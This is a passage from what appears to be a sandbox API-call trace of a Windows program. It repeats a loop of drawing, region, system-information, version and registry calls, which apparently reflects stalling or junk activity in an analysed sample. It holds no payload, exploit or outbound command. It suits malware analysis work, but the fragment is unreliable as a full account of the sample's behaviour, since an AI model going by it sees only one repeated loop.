wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.039] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.039] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.039] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.039] BeginPath (hdc=0x0) returned 0 [0091.039] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.039] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.039] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.039] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.039] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.039] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.039] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.039] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.039] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401d9 [0091.039] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401dc [0091.039] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a1d [0091.039] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a1e [0091.039] CombineRgn (hrgnDst=0x1045a1d, hrgnSrc1=0xbe0401d9, hrgnSrc2=0xbc0401dc, iMode=1) returned 1 [0091.039] CombineRgn (hrgnDst=0x1045a1e, hrgnSrc1=0xbe0401d9, hrgnSrc2=0xbc0401dc, iMode=4) returned 2 [0091.039] CreateSolidBrush (color=0xff) returned 0x2105a1c [0091.039] CreateSolidBrush (color=0xff0000) returned 0x1105a1f [0091.039] DeleteObject (ho=0x1105a1f) returned 1 [0091.039] DeleteObject (ho=0xbc0401dc) returned 1 [0091.039] DeleteObject (ho=0xbe0401d9) returned 1 [0091.039] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.039] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.039] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.040] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.040] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.040] BeginPath (hdc=0x0) returned 0 [0091.040] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.040] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.040] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.040] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.040] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.040] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.040] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.040] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.040] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401dc [0091.040] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401d9 [0091.040] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a20 [0091.040] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a21 [0091.040] CombineRgn (hrgnDst=0x1045a20, hrgnSrc1=0xbd0401dc, hrgnSrc2=0xbf0401d9, iMode=1) returned 1 [0091.040] CombineRgn (hrgnDst=0x1045a21, hrgnSrc1=0xbd0401dc, hrgnSrc2=0xbf0401d9, iMode=4) returned 2 [0091.040] CreateSolidBrush (color=0xff) returned 0x2105a1f [0091.040] CreateSolidBrush (color=0xff0000) returned 0x1105a22 [0091.040] DeleteObject (ho=0x1105a22) returned 1 [0091.040] DeleteObject (ho=0xbf0401d9) returned 1 [0091.040] DeleteObject (ho=0xbd0401dc) returned 1 [0091.040] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.040] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.040] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.040] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.040] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.040] BeginPath (hdc=0x0) returned 0 [0091.040] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.041] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.041] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.041] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.041] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.041] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.041] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.041] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.041] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401d9 [0091.041] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401dc [0091.041] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a23 [0091.041] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a24 [0091.041] CombineRgn (hrgnDst=0x1045a23, hrgnSrc1=0xc00401d9, hrgnSrc2=0xbe0401dc, iMode=1) returned 1 [0091.041] CombineRgn (hrgnDst=0x1045a24, hrgnSrc1=0xc00401d9, hrgnSrc2=0xbe0401dc, iMode=4) returned 2 [0091.041] CreateSolidBrush (color=0xff) returned 0x2105a22 [0091.041] CreateSolidBrush (color=0xff0000) returned 0x1105a25 [0091.041] DeleteObject (ho=0x1105a25) returned 1 [0091.041] DeleteObject (ho=0xbe0401dc) returned 1 [0091.041] DeleteObject (ho=0xc00401d9) returned 1 [0091.041] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.041] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.041] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.041] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.041] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.041] BeginPath (hdc=0x0) returned 0 [0091.041] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.041] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.041] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.041] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.041] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.041] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.042] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.042] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401dc [0091.042] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401d9 [0091.042] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a26 [0091.042] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a27 [0091.042] CombineRgn (hrgnDst=0x1045a26, hrgnSrc1=0xbf0401dc, hrgnSrc2=0xc10401d9, iMode=1) returned 1 [0091.042] CombineRgn (hrgnDst=0x1045a27, hrgnSrc1=0xbf0401dc, hrgnSrc2=0xc10401d9, iMode=4) returned 2 [0091.042] CreateSolidBrush (color=0xff) returned 0x2105a25 [0091.042] CreateSolidBrush (color=0xff0000) returned 0x1105a28 [0091.042] DeleteObject (ho=0x1105a28) returned 1 [0091.042] DeleteObject (ho=0xc10401d9) returned 1 [0091.042] DeleteObject (ho=0xbf0401dc) returned 1 [0091.042] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.042] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.042] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.042] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.042] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.042] BeginPath (hdc=0x0) returned 0 [0091.042] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.042] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.042] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.042] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.042] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.042] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.042] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.043] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.043] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401d9 [0091.043] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401dc [0091.043] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a29 [0091.043] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a2a [0091.043] CombineRgn (hrgnDst=0x1045a29, hrgnSrc1=0xc20401d9, hrgnSrc2=0xc00401dc, iMode=1) returned 1 [0091.043] CombineRgn (hrgnDst=0x1045a2a, hrgnSrc1=0xc20401d9, hrgnSrc2=0xc00401dc, iMode=4) returned 2 [0091.043] CreateSolidBrush (color=0xff) returned 0x2105a28 [0091.043] CreateSolidBrush (color=0xff0000) returned 0x1105a2b [0091.043] DeleteObject (ho=0x1105a2b) returned 1 [0091.043] DeleteObject (ho=0xc00401dc) returned 1 [0091.043] DeleteObject (ho=0xc20401d9) returned 1 [0091.043] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.043] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.043] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.043] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.043] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.043] BeginPath (hdc=0x0) returned 0 [0091.043] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.043] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.043] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.043] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.043] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.043] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.043] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.043] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.044] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc10401dc [0091.044] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc30401d9 [0091.044] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a2c [0091.044] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a2d [0091.044] CombineRgn (hrgnDst=0x1045a2c, hrgnSrc1=0xc10401dc, hrgnSrc2=0xc30401d9, iMode=1) returned 1 [0091.044] CombineRgn (hrgnDst=0x1045a2d, hrgnSrc1=0xc10401dc, hrgnSrc2=0xc30401d9, iMode=4) returned 2 [0091.044] CreateSolidBrush (color=0xff) returned 0x2105a2b [0091.044] CreateSolidBrush (color=0xff0000) returned 0x1105a2e [0091.044] DeleteObject (ho=0x1105a2e) returned 1 [0091.044] DeleteObject (ho=0xc30401d9) returned 1 [0091.044] DeleteObject (ho=0xc10401dc) returned 1 [0091.044] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.044] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.044] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.044] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.044] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.044] BeginPath (hdc=0x0) returned 0 [0091.044] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.044] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.044] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.044] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.044] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.044] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.044] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.044] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.044] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc40401d9 [0091.044] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc20401dc [0091.044] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a2f [0091.045] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a30 [0091.045] CombineRgn (hrgnDst=0x1045a2f, hrgnSrc1=0xc40401d9, hrgnSrc2=0xc20401dc, iMode=1) returned 1 [0091.045] CombineRgn (hrgnDst=0x1045a30, hrgnSrc1=0xc40401d9, hrgnSrc2=0xc20401dc, iMode=4) returned 2 [0091.045] CreateSolidBrush (color=0xff) returned 0x2105a2e [0091.045] CreateSolidBrush (color=0xff0000) returned 0x1105a31 [0091.045] DeleteObject (ho=0x1105a31) returned 1 [0091.045] DeleteObject (ho=0xc20401dc) returned 1 [0091.045] DeleteObject (ho=0xc40401d9) returned 1 [0091.045] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.045] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.045] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.045] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.045] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.045] BeginPath (hdc=0x0) returned 0 [0091.045] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.045] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.045] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.045] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.045] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.045] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.045] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.045] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.045] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc30401dc [0091.045] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc50401d9 [0091.045] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a32 [0091.045] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a33 [0091.045] CombineRgn (hrgnDst=0x1045a32, hrgnSrc1=0xc30401dc, hrgnSrc2=0xc50401d9, iMode=1) returned 1 [0091.045] CombineRgn (hrgnDst=0x1045a33, hrgnSrc1=0xc30401dc, hrgnSrc2=0xc50401d9, iMode=4) returned 2 [0091.046] CreateSolidBrush (color=0xff) returned 0x2105a31 [0091.046] CreateSolidBrush (color=0xff0000) returned 0x1105a34 [0091.046] DeleteObject (ho=0x1105a34) returned 1 [0091.046] DeleteObject (ho=0xc50401d9) returned 1 [0091.046] DeleteObject (ho=0xc30401dc) returned 1 [0091.046] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.046] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.046] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.046] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.046] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.046] BeginPath (hdc=0x0) returned 0 [0091.046] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.046] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.046] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.046] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.046] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.046] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.046] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.046] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc60401d9 [0091.046] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc40401dc [0091.046] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a35 [0091.046] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a36 [0091.046] CombineRgn (hrgnDst=0x1045a35, hrgnSrc1=0xc60401d9, hrgnSrc2=0xc40401dc, iMode=1) returned 1 [0091.046] CombineRgn (hrgnDst=0x1045a36, hrgnSrc1=0xc60401d9, hrgnSrc2=0xc40401dc, iMode=4) returned 2 [0091.046] CreateSolidBrush (color=0xff) returned 0x2105a34 [0091.046] CreateSolidBrush (color=0xff0000) returned 0x1105a37 [0091.046] DeleteObject (ho=0x1105a37) returned 1 [0091.047] DeleteObject (ho=0xc40401dc) returned 1 [0091.047] DeleteObject (ho=0xc60401d9) returned 1 [0091.047] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.047] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.047] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.047] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.047] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.047] BeginPath (hdc=0x0) returned 0 [0091.047] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.047] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.047] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.047] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | 